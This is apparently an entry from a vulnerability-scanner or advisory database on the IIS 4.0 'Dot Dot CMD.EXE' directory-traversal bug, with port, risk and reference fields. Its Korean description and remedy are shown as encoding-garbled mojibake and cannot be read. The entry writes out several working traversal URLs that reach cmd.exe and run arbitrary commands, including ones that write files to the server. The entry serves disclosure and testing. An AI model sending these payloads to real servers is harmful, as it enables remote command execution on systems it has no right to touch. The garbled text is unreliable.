| Ãë¾àÁ¡ID |
22033 |
| À§Çèµµ |
40 |
| Æ÷Æ® |
80, ... |
| ÇÁ·ÎÅäÄÝ |
TCP |
| ºÐ·ù |
WWW |
| »ó¼¼¼³¸í |
IIS 4.0 ±¸¹öÀüÀÇ ¹ö±×·Î "Dot Dot CMD.EXE" ¹ö±×°¡ ÀÖ´Ù. ÇØ´ç ¼¹ö´Â ÀÌ·¯ÇÑ ¹ö±×¸¦ ÀÌ¿ëÇØ ¿ÜºÎ¿¡¼ ¼¹ö³»ÀÇ ÀÓÀÇÀÇ ¸í·ÉÀ» ¼öÇàÇÒ ¼ö ÀÖ´Â Ãë¾àÁ¡À» °¡Áö°í ÀÖ´Ù. ´ÙÀ½°ú °°ÀÌ Çϸé Å×½ºÆ®ÇØ º¼ ¼ö ÀÖ´Ù.
http://[domain_name]/scripts/../../cmd.exe/?%2FC+any_command
ȤÀº, http://[domain_name]/scripts/../../cmd.exe/?%2FC+any_command>FULL_PATH\filename
ȤÀº,
http://[domain_name]/scripts/../../cmd.exe/?%2FC+any_command>>FULL_PATH\filename
ȤÀº,
http://[domain_name]/scripts/../../cmd.exe/?%2FC+echo+"hello,+World">c:\temp\hello.bat |
| ÇØ°áÃ¥ |
Áï½Ã ½Ã½ºÅÛ °¡µ¿À» Áß´ÜÇÏ°í MS»ç¿¡ ¹®ÀÇÇÏ¿© ÃֽŠ¹öÀüÀ» ±¸ÇÏ¿© ¼³Ä¡ÇÑ´Ù. |
| °ü·Ã URL |
(CVE) |
| °ü·Ã URL |
(SecurityFocus) |
| °ü·Ã URL |
(ISS) |
|
